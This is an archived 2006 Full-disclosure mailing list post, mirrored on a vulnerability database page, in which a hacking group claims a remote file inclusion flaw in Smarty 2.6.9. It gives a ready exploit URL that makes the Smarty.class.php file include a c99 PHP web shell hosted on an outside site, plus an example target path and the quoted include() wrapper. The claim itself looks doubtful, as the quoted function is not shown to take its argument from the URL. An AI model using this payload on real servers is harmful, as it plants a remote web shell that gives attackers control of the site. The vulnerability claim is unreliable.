Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14698
HistoryOct 15, 2006 - 12:00 a.m.

[Full-disclosure] Vuln

2006-10-1500:00:00
vulners.com
17

Hi I find a new vuln …

the vuln :-

#########################################################

Auother :- Sp1deR_NeT

E-mail :- [email protected]

Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com

We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .

#########################################################

Script :- Smarty-2.6.9

Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Example :-
www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Vuln Code :-
/**
* wrapper for include() retaining $this
* @return mixed
*/
function _include($filename, $once=false, $params=null)
{
if ($once) {
return include_once($filename);
} else {
return include($filename);
}
}

Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.


WwW.Sp1deR-N3T.Com ///\\\///\\\

[email protected]==============

!@!@!@!@!@!


Windows Liveβ„’ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb